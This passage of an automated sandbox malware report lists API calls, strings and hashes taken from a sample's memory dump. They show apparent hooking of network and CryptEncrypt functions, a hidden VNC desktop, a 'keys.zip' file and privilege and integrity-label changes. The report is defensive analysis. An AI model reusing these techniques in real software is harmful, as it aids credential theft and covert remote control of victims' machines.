                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 012E9142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 012E915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E9194
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 188880187-3887548279
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,774CF550,774CDF10,012F598B), ref: 012F9831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 012F9843
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                                • Part of subcall function 012FA540: memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 012F9862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 012F9870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 012F988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 012F98A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 012F98C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1216545827-2206184491
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 013019CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013019D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013019ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013019FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000217D0,00000000,00000000,00000000), ref: 01301A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c310), ref: 01301A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c310,KBP), ref: 01301A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01301A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61c5c310$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4173420962-834708227
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(0000B670,?,774D3258,774D30D0), ref: 0130C8EB
                                                                                                                                                                                                              • getpeername.WS2_32(?,?,00000010), ref: 0130C930
                                                                                                                                                                                                              • malloc.MSVCRT(00000010), ref: 0130C938
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 0130C94A
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 0130C960
                                                                                                                                                                                                              • malloc.MSVCRT(0000000C), ref: 0130C96E
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0130C9A2
                                                                                                                                                                                                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0130C9B9
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 0130C9C7
                                                                                                                                                                                                              • malloc.MSVCRT(00000028), ref: 0130CA53
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,00000000,00000000,?,?), ref: 0130CA86
                                                                                                                                                                                                              • malloc.MSVCRT(0000000C), ref: 0130CC12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              • API String ID: 725816019-3790533501
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F01A0: memset.MSVCRT(?,00000000,00000823), ref: 012F01F4
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F020C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapValidate.KERNEL32(00000000), ref: 012F020F
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F021C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapFree.KERNEL32(00000000), ref: 012F021F
                                                                                                                                                                                                                • Part of subcall function 012F01A0: InternetQueryOptionA.WININET(?,00000022,00000000,-0132FAE4), ref: 012F023C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F0259
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapAlloc.KERNEL32(00000000), ref: 012F0260
                                                                                                                                                                                                                • Part of subcall function 012F01A0: memset.MSVCRT(00000000,00000000,00000014), ref: 012F0270
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 012F0582
                                                                                                                                                                                                              • InternetSetStatusCallback.WININET ref: 012F0596
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,?,Function_00010500), ref: 012F05A7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,Function_00010500), ref: 012F05AE
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00001010,?,?,?,Function_00010500), ref: 012F05C1
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,Function_00010500), ref: 012F05FB
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,Function_00010500), ref: 012F0647
                                                                                                                                                                                                              • InternetSetStatusCallback.WININET(?,?), ref: 012F0675
                                                                                                                                                                                                              • SetLastError.KERNEL32(00002EE4,?,?,?,Function_00010500), ref: 012F06D1
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F040B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F040E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F041B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F041E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetHandleInformation.KERNEL32(?,00000000), ref: 012F0437
                                                                                                                                                                                                                • Part of subcall function 012F03E0: CloseHandle.KERNEL32(?), ref: 012F0448
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F0458
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F045B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F0468
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F046B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F047B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F047E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F048B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F048E
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 012F070A
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?), ref: 012F071E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?), ref: 012F0733
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Internetmemset$AllocCallbackErrorHandleLastReadStatusmemcpy$CloseEventInformationOptionQueryReset
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 2621060597-3887548279
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,774CF380,00000000,00000000,?,012F4EFC,00000000,012E6E36,00000000,00000000), ref: 012E738D
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012E73B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,012F4EFC,00000000,00000000,?,012F4EFC), ref: 012E73D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 012E73EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,012F4EFC), ref: 012E73F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,012F4EFC), ref: 012E740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,012F4EFC), ref: 012E741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,012E6E36,00000000,00000000,00000000,?,012F4EFC), ref: 012E742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,012F4EFC), ref: 012E743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,?,012F4EFC), ref: 012E744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,012F4EFC), ref: 012E746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,012F4EFC), ref: 012E747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 9eaf8f218f53e5341dd67b29ee6d69e454b44c1354fa6efd8a6b0e7953d414b2
                                                                                                                                                                                                              • Instruction ID: 40620b5ed914009e35593e2be0c1c8f098cf8a6421c5d55d97a46adcbbe5c310
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eaf8f218f53e5341dd67b29ee6d69e454b44c1354fa6efd8a6b0e7953d414b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE418D76650209BBEB30AE68DC49FEE7BACEB45751F508019FB04DA1C0D7B09A408BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 013019CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013019D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013019ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013019FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000217D0,00000000,00000000,00000000), ref: 01301A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c310), ref: 01301A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c310,KBP), ref: 01301A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01301A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61c5c310$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4173420962-834708227
                                                                                                                                                                                                              • Opcode ID: f52d41835df52e02927f31f9dcf465bf38dde45969116a3af0b2a9b5a8e3557a
                                                                                                                                                                                                              • Instruction ID: 32d44c14bda0a9b64766529855a0a771d7bd68bf14db9c06eabc9de6e133d74b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f52d41835df52e02927f31f9dcf465bf38dde45969116a3af0b2a9b5a8e3557a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 570186316867557BF2337B644C1AF9E7AD86F45F5AF11010CFA11752C4C7A4D5008BAA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012EEB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000), ref: 012EEBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000), ref: 012EEC91
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 012EEDD3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,http://,00000007), ref: 012EEE8E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007), ref: 012EEE9F
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EEED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              • API String ID: 438689982-3158524741
                                                                                                                                                                                                              • Opcode ID: f22770b53efd5c842e5d0ad71f5eaf5bdf7bfbec599094179c2a93bb1aa9c682
                                                                                                                                                                                                              • Instruction ID: 7a26f88d0f01955adea22f5e9897ea1fee924496737fb47a625641e6f1f3ce3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f22770b53efd5c842e5d0ad71f5eaf5bdf7bfbec599094179c2a93bb1aa9c682
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD13931E1021B4BEF219E6CC8887EEBBE5BF45314F8A4559EB05AB245E730D841C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,00000000), ref: 013041D7
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,path%i.txt,00000000), ref: 01304237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 761212885-2476591467
                                                                                                                                                                                                              • Opcode ID: 1804582c960f71516f155be065d1653a0b6acaffb42de9169edf45e92a3ce4dc
                                                                                                                                                                                                              • Instruction ID: 3e4a3ad671e3b092ca3a9e2561a25b86dcb90480ff124e108fba51884c0189dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1804582c960f71516f155be065d1653a0b6acaffb42de9169edf45e92a3ce4dc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5513D34A0064A5FCB2BDF3C9879BFA7BE5AF4A304F1445D8E986D7241DA719A48C780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,774D3050,774D30D0,774D3080), ref: 012E91F0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E9204
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E920F
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,00000006,00000000), ref: 012E9237
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012E9254
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9265
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012E9285
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012E929C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 012E92DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,?,?), ref: 012E9324
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,?,?), ref: 012E932D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2125184990-1167384825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012F0437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012F0448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(012F70A0), ref: 012E6350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 012E635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,775B7390), ref: 012E636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A,774CF550), ref: 012E6383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 012E639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 012E63BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 012E63D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$#680CacheFlushLibraryLoadResolver
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 3335484569-3547598143
                                                                                                                                                                                                              APIs
